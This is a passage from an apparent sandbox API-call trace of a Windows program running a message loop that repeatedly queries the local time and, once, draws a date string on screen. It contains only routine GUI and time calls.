wMilliseconds=0x277)) [0107.890] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.903] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.903] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.903] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x284)) [0107.903] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x284)) [0107.903] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.926] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.926] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.926] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x29b)) [0107.926] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x29c)) [0107.926] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.944] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.944] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.944] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x2ae)) [0107.944] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x2ae)) [0107.945] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.948] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.948] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.948] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x2b2)) [0107.948] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x2b2)) [0107.949] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.965] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.965] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.965] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x2c2)) [0107.965] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x2c2)) [0107.965] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0107.998] TranslateMessage (lpMsg=0x2347a14) returned 0 [0107.998] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0107.998] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x2e3)) [0107.998] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x2e3)) [0107.998] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.019] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.019] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.019] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x2f9)) [0108.019] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x2f9)) [0108.019] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.028] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.028] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.028] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x301)) [0108.028] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x301)) [0108.028] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.044] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.044] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.044] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x311)) [0108.044] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x311)) [0108.044] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.057] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.057] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.058] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x31f)) [0108.058] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x31f)) [0108.058] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.076] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.076] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.076] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x332)) [0108.076] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x332)) [0108.076] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.098] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.098] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.098] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x347)) [0108.098] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x347)) [0108.098] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.107] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.107] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.107] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x350)) [0108.107] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x350)) [0108.107] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.129] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.129] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.129] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x366)) [0108.129] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x366)) [0108.129] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.140] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.140] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.140] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x371)) [0108.140] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x371)) [0108.140] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.151] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.151] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.151] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x37c)) [0108.151] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x37c)) [0108.151] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.176] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.176] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.176] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x395)) [0108.176] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x395)) [0108.176] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.184] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.184] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.184] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x39d)) [0108.184] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x39d)) [0108.184] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.206] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.206] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.206] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x3b3)) [0108.206] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x3b3)) [0108.206] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.221] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.221] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.221] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x3c2)) [0108.221] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x3c2)) [0108.221] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.232] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.232] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.232] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x3cd)) [0108.232] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x3cd)) [0108.232] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.253] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.253] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.253] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x3e2)) [0108.253] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x25, wMilliseconds=0x3e2)) [0108.253] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.264] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.264] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.264] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x5)) [0108.264] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x5)) [0108.264] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0108.264] GetDC (hWnd=0x0) returned 0xa0100d0 [0108.264] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0108.265] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0108.265] GetSysColor (nIndex=8) returned 0x0 [0108.265] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0108.265] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0108.265] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0108.265] UnrealizeObject (h=0x2d10099f) returned 1 [0108.265] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0108.265] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0108.265] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0108.265] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:38 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:38 PM", lprc=0x19f5bd) returned 13 [0108.266] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0108.266] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0108.266] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0108.266] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0108.266] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0108.266] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.283] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.283] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.283] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x18)) [0108.283] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x18)) [0108.283] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.304] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.304] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.304] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x2e)) [0108.305] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x2e)) [0108.305] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.312] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.312] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.312] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x35)) [0108.312] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x35)) [0108.312] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.323] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.323] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.323] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x40)) [0108.323] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x40)) [0108.323] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.344] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.344] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.344] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x56)) [0108.344] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x56)) [0108.345] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.355] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.355] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.355] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x60)) [0108.355] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x60)) [0108.355] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.371] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.371] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.371] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x70)) [0108.371] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x70)) [0108.371] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.388] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.388] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.388] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x81)) [0108.388] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0x81)) [0108.388] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.420] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.420] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.420] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0xa2)) [0108.420] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0xa2)) [0108.421] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.473] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.473] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.473] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0xd6)) [0108.473] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0xd6)) [0108.473] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.484] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.484] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.484] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0xe2)) [0108.485] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, wMilliseconds=0xe2)) [0108.485] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0108.505] TranslateMessage (lpMsg=0x2347a14) returned 0 [0108.505] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0108.505] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x26, 